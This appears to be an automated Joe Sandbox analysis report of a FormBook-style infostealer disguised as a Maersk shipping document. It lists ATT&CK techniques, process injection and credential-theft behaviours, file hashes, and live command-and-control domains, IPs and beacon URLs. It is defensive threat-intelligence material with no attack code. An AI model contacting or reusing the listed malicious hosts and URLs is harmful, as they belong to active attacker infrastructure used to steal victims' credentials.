                Source: Yara matchFile source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572390 Sample: MAERSK LINE SHIPPING DOC_4253.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 31 www.070001325.xyz 2->31 33 www.taxiquynhonnew.click 2->33 35 3 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 53 6 other signatures 2->53 10 MAERSK LINE SHIPPING DOC_4253.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\...\MAERSK LINE SHIPPING DOC_4253.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 MAERSK LINE SHIPPING DOC_4253.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 FeNbdhmZHKN.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 tzutil.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 FeNbdhmZHKN.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 www.expancz.top 107.155.56.30, 49908, 49914, 49921 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 23->37 39 www.070001325.xyz 161.97.142.144, 49868, 80 CONTABODE United States 23->39 41 dns.ladipage.com 13.228.81.39, 49947, 49954, 49961 AMAZON-02US United States 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                MAERSK LINE SHIPPING DOC_4253.exe26%ReversingLabs
                MAERSK LINE SHIPPING DOC_4253.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.taxiquynhonnew.click0%Avira URL Cloudsafe
                http://www.070001325.xyz/gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP100%Avira URL Cloudmalware
                https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgU100%Avira URL Cloudmalware
                https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe
                https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.expancz.top
                		107.155.56.30
                		truefalse
                  		high
                  dns.ladipage.com
                  		13.228.81.39
                  		truefalse
                    		high
                    www.070001325.xyz
                    		161.97.142.144
                    		truefalse
                      		high
                      www.epitomize.shop
                      		unknown
                      		unknownfalse
                        		unknown
                        www.taxiquynhonnew.click
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmPtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.taxiquynhonnew.click/y49d/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.070001325.xyz/gebt/?2z=xX0xzrrpPjmP&jHm4GXr=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/chrome_newtabtzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://s.yimg.com/wi/ytc.jstzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000006.00000002.2538835830.0000000003FA6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.2540239955.0000000006190000.00000004.00000800.00020000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://dq0ib5xlct7tw.cloudfront.net/FeNbdhmZHKN.exe, 00000009.00000002.2538103982.0000000003826000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.ecosia.org/newtab/tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMAERSK LINE SHIPPING DOC_4253.exe, 00000000.00000002.1336551856.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000006.00000002.2540372842.0000000007C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUtzutil.exe, 00000006.00000002.2538835830.0000000004138000.00000004.10000000.00040000.00000000.sdmp, FeNbdhmZHKN.exe, 00000009.00000002.2538103982.00000000039B8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.taxiquynhonnew.clickFeNbdhmZHKN.exe, 00000009.00000002.2537167858.00000000013C2000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  161.97.142.144
                                                  		www.070001325.xyzUnited States
                                                  		51167CONTABODEfalse
                                                  13.228.81.39
                                                  		dns.ladipage.comUnited States
                                                  		16509AMAZON-02USfalse
                                                  107.155.56.30
                                                  		www.expancz.topUnited States
                                                  		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1572390
                                                  Start date and time:2024-12-10 14:20:00 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 8m 49s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:11
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:MAERSK LINE SHIPPING DOC_4253.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@6/3
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 193
                                                  • Number of non-executed functions: 306
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 23.36.245.152, 20.12.23.50
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target FeNbdhmZHKN.exe, PID 6316 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • VT rate limit hit for: MAERSK LINE SHIPPING DOC_4253.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:20:55API Interceptor32x Sleep call for process: MAERSK LINE SHIPPING DOC_4253.exe modified
                                                  08:22:31API Interceptor58x Sleep call for process: tzutil.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  161.97.142.144New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.070002018.xyz/6m2n/
                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                  • www.030002613.xyz/xd9h/
                                                  Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.030002449.xyz/cfqm/
                                                  PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                  • www.070001955.xyz/7zj0/
                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.54248711.xyz/jm2l/
                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.030002613.xyz/xd9h/
                                                  Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                  • www.070002018.xyz/6m2n/
                                                  PO #2411071822.exeGet hashmaliciousFormBookBrowse
                                                  • www.54248711.xyz/jm2l/
                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                  • www.54248711.xyz/jm2l/
                                                  13.228.81.39QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                  • www.muasamgiare.click/dc08/
                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.taxiquynhonnew.click/y49d/
                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • www.masteriocp.online/wg84/
                                                  Shipping report#Cargo Handling.exeGet hashmaliciousFormBookBrowse
                                                  • www.masteriocp.online/p5rq/
                                                  PO76389.exeGet hashmaliciousFormBookBrowse
                                                  • www.masteriocp.online/p5rq/
                                                  r3T-ENQ-O-2024-10856.exeGet hashmaliciousFormBookBrowse
                                                  • www.masteriocp.online/p5rq/
                                                  SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                  • www.tmstore.click/xme5/?RD4=n0CKpMQN4gGZ92M5/3EtOcSUkm26Kn20yY4QJn1V5vv9XAZ2vYFLUkiK71x3Mm43WM97SNcNOsfAT2BrwuTBRE9eXvmWucLueMGlkNS8dNMHocOVM3LStbA=&VzA=dz5HvTSP4ZdlFHDP
                                                  z11SOAAUG2408.exeGet hashmaliciousFormBookBrowse
                                                  • www.masteriocp.online/p5rq/
                                                  REQUEST FOR QUOTATION.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • www.masteriocp.online/wg84/
                                                  Proforma_Invoice.pif.exeGet hashmaliciousFormBookBrowse
                                                  • www.againbeautywhiteskin.asia/3h10/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  dns.ladipage.comQUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                  • 13.228.81.39
                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 54.179.173.60
                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 18.139.62.226
                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 13.228.81.39
                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  wavjjT3sEq.exeGet hashmaliciousFormBookBrowse
                                                  • 54.179.173.60
                                                  COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  Order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 54.179.173.60
                                                  7v8szLCQAn.exeGet hashmaliciousFormBookBrowse
                                                  • 54.179.173.60
                                                  Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                  • 18.139.62.226
                                                  www.expancz.topNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 107.155.56.30
                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 107.155.56.30
                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 107.155.56.30
                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                  • 107.155.56.30
                                                  www.070001325.xyzNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.142.144
                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 161.97.142.144
                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 161.97.142.144
                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.142.144

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  AMAZON-02UShttps://t.ly/8cSDxGet hashmaliciousUnknownBrowse
                                                  • 52.57.179.60
                                                  NESTLE_MEXICO_Purchase_Order_10122024.xlsGet hashmaliciousUnknownBrowse
                                                  • 54.150.207.131
                                                  ple.batGet hashmaliciousUnknownBrowse
                                                  • 52.58.42.230
                                                  m.-..-6-.-8k.elfGet hashmaliciousGafgytBrowse
                                                  • 54.171.230.55
                                                  https://app.droplet.io/form/yEoAzKGet hashmaliciousUnknownBrowse
                                                  • 3.23.93.108
                                                  https://z37ifd8z1a.execute-api.eu-north-1.amazonaws.com/pery/Get hashmaliciousUnknownBrowse
                                                  • 13.61.124.29
                                                  https://app.droplet.io/form/yEoAzKGet hashmaliciousUnknownBrowse
                                                  • 54.230.112.36
                                                  a.-r.-m6.elfGet hashmaliciousGafgytBrowse
                                                  • 54.171.230.55
                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                  • 13.248.169.48
                                                  k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                  • 54.200.77.17
                                                  UHGL-AS-APUCloudHKHoldingsGroupLimitedHKNew Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 107.155.56.30
                                                  Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 107.155.56.30
                                                  nabppc.elfGet hashmaliciousUnknownBrowse
                                                  • 107.155.48.54
                                                  shell64.elfGet hashmaliciousConnectBackBrowse
                                                  • 45.43.36.223
                                                  XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 107.155.56.30
                                                  Swift copy.exeGet hashmaliciousFormBookBrowse
                                                  • 107.155.56.30
                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                  • 152.32.197.201
                                                  SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                  • 152.32.197.201
                                                  https://rwy.xpbf130.vip/Get hashmaliciousUnknownBrowse
                                                  • 101.36.121.234
                                                  http://cmn.ftft155.vip/Get hashmaliciousUnknownBrowse
                                                  • 101.36.121.234
                                                  CONTABODENeed Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  New quotation request.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                  • 167.86.111.146
                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.142.144
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 161.97.168.245
                                                  Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 161.97.142.144

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAERSK LINE SHIPPING DOC_4253.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                  C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\tzutil.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1209935793793442
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                  MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                  SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                  SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                  SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.616900235750765
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:MAERSK LINE SHIPPING DOC_4253.exe
                                                  File size:876'544 bytes
                                                  MD5:1175234dabbeab0e4a9ee04802ef57fa
                                                  SHA1:1b66c849b4ca2f01c7c778e4fbf4d91b8302dc09
                                                  SHA256:5ca92658980b5d1f46f53d78202bd40e442163622e2edb5220046f74e5748945
                                                  SHA512:f12ed264cb4d1fdd7143c0f7e4262669233c3e2dd4014694ca9754af082667b99544d9d240668105ab4f7f88c0c1a9072324757181504f5ad4af302defd94191
                                                  SSDEEP:12288:ehM1Tp5XxnOi1S/7LCaMm3ryNv1OpXt6FJFYDdJMiQGKRUq8sVW4NMwy9EXX+F:ZTDQi1m7TMm3owgv+DLQGKuRsZNMwFO
                                                  TLSH:4715E014736ECB16C57947F00A71E6B823796C9AB822D20F6ED9BFDF7875B144A00683
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..V...........t... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:90cececece8e8eb0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4d7416
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xA3168CF8 [Thu Sep 14 13:34:48 2056 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

